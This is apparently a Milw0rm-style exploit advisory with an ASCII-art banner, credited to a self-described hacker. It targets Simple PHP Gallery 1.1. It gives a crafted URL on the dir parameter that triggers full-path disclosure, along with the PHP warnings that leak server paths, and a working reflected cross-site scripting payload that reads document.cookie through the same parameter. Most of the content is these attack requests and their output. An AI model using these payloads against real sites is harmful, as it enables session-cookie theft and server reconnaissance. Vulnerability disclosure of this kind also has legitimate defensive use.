+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;;ii,,::
:::: :: ;;tt;;::
;;:: ..,,:: ;;ii,,::
,,,, ii;;,, ii;;:: ;;ii,,::
ii:: tt;;,, ..tt;;,,.. ;;ii;;::
ii,,:: ttii,, ..ff;;;;:: ;;ii;;::
tt;;::..,, tt;;,, ff;;;;ii ;;ii,,::
tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,::
tt;;;;,, tt;;,,.. tt;;;; ;;ii;;::
..::,,;;,, tt;;,,.. tt;;,, ;;ii,,::
..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,::
::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,::
,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;::
;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,..
ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,..
,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;..
tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,..
jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,..
;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;..
..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,..
iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;;
..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,,
jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,,
jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii::
iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii
;;.. ii;;
..
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker
+
+Script : Simple PHP Gallery 1.1
+Impact : Cross site scripting & fullpath disclosure
+
+
+Fullpath disclosure :
+
+http://localhost/sp_index.php?dir=[Somthingwrong]
+
+Result
+
+
+Warning: opendir(123): failed to open dir: No such file or directory in
/var/www/html/gallery/sp_helper_functions.php on line 10 +
+
+Warning: readdir(): supplied argument is not a valid Directory resource in
/var/www/html/gallery/sp_helper_functions.php on line 11 +
+
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147
+
+
+
+
+Cross Site Scripting
+
+
+
+dir variable is not probrely verified and can be used to execute html and javascript code
+
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script>
+
+/Milw0rm
+
+
+in subject hot : Cross site scripting & fullpath disclosure ;)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++